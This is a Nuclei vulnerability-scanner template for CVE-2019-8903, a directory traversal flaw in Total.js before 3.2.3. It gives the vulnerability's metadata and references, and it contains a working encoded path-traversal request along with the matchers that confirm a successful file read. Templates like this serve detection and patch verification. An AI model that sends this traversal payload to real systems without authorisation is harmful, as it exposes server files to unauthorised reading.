nuclei-templates/http/cves/2019/CVE-2019-8903.yaml

47 lines
1.6 KiB
YAML

id: CVE-2019-8903
info:
name: Totaljs <3.2.3 - Local File Inclusion
author: madrobot
severity: high
description: Total.js Platform before 3.2.3 is vulnerable to local file inclusion.
impact: |
An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
remediation: |
Upgrade Totaljs to version 3.2.3 or later to fix the LFI vulnerability.
reference:
- https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903
- https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7
- https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b
- https://nvd.nist.gov/vuln/detail/CVE-2019-8903
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-8903
cwe-id: CWE-22
epss-score: 0.01071
epss-percentile: 0.8251
cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:*
metadata:
max-request: 1
vendor: totaljs
product: total.js
framework: node.js
tags: cve,cve2019,totaljs,lfi,node.js
http:
- method: GET
path:
- "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "apache2.conf"
- type: status
status:
- 200
# digest: 4a0a00473045022100cde8a7c40a264d3bb735abcd6795fc26e6a21e5c9399aaeafba0e43dd5a85b3502201d0b0cd73908e07f7d20aed884de81385034bb7ce6e786e979b393126564d1b8:922c64590222798bb761d5b6d8e72950